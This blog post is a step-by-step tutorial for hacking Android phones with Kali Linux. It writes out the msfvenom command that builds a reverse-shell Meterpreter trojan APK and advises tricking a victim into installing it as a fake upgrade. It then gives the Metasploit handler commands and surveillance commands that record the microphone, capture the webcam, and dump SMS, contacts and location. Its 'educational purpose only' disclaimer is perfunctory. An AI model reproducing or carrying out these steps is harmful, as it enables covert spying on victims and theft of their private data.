[Update] How To Hack An Andriod Smart Phone Using Kali Linux



Having noted about the previous tutorial,any of this blog post,don't use it as reverge,misusues it,misinterprint it and most above all,don't use any of this blog post to hack somebody properties for any of this act you conduct will be use against You! Hacking is one of the most online activities We have passionately in it,not just to know the true means of hacking,but to know how to protect Ourself from being hacked. Sometime its getting out of nerve for You to see any of Your properties been steal away from You in form of hacking,painful right? That's Our main reason We are here to help out in such of any act.

Previously,We make a blog post on"How to recover Your Facebook password if been hacked using Kali Linux"  http://www.naijatroop.com/2017/07/how-to-recover-your-lost-facebook.html
You can read it below if You picked intrest in reading it. We are very sure if You are a regular daily visitor(s),You are happy to be here because,You see an intresting topics to  to Your likely. You can join our visitors also to be getting our latest blog post in every latest posts here,Be the first to read Our new blog post.Note: You might find it difficults to be receiving daily blog posting,why? This is the reason.

In any blog posts,posted here,We make research,practicalised it,befor posting  it here for viewers. Looking at the main topic of today "HOW TO HACK AN ANDRIOD SMART PHONE USING KALI LINUX" Wooh! intresting topic right? I guess You might have be looking for a way to accumulate this to Your knowledge as an hacker. With the help of this post,You will learn how to do this in a very simple way if only you are focus  with the post. Make sure You follow the exact direction giving here to make this done.

HOW TO HACK AN ANDRIOD SMART PHONE USING KALI LINUX

FIRST GUILD
LUNCH OR START UP YOUR KALI:
Move to the command Terminal in the Kali and open it,write the below code as directed "ifconfig" and hit the enter stroke key.

SECOND GUILD
Now You need Your IP address after getting Your IP address,copy it in a safe place i.e; You will use it later when necessary. Close the Terminal.

THIRD GUILD
Here We are going to make an TROJAN.APK. Now open the command terminal again and write the command that is written below,after written it You hit the enter stroke key.

msfvenom -p android/meterpreter/
reverse_tcp LHOST=(IP ADDRESS)
LPORT=4444 R > andro.apk

CAUTION: The IP address You wrote some where its time to use it,enter the IP address in The LHOST"IP ADDRESS"
PART that You had copied/written earlier and
Don’t add any stray space characters
anywhere.

FOURTH GUILD
After Executing the previous command, you will get to see an apk file saved in the Home folder. All you have to do
is just install the apk file in the victim’s Andriod smart phone. You can send it via message,or social media,or by all means of transfer any files and immediately the victim install it thinking maybe It's an upgrade apk then,You are done.

Now the final guilds;
Open the Terminal command and type "msfconsole" and hit the  enter key stroke.And again write the followed commands

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (IP ADDRESS)
set LPORT 4444
exploit

Make sure to write the IP ADDRESS"YOUR IP ADDRESS"in the LHOST PART. Now You have sucessfully hack the victim Andriod smart phone. Whenever the victims clicks and install the app in his/her Andriod smart phone,meterpreter session will be established. After that You can use the following command:

record_mic
webcam_snap
webcam_stream
dump_contacts
dump_sms
geolocate

Wish You good luck in hacking, but note before hacking someone Mobile let him/her know cause if You do it without their awareness then its illegal and if You're caught then you will surely end up in jail.THANKS FOR READING this,this is for educational purpose only. Always share our post comments.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel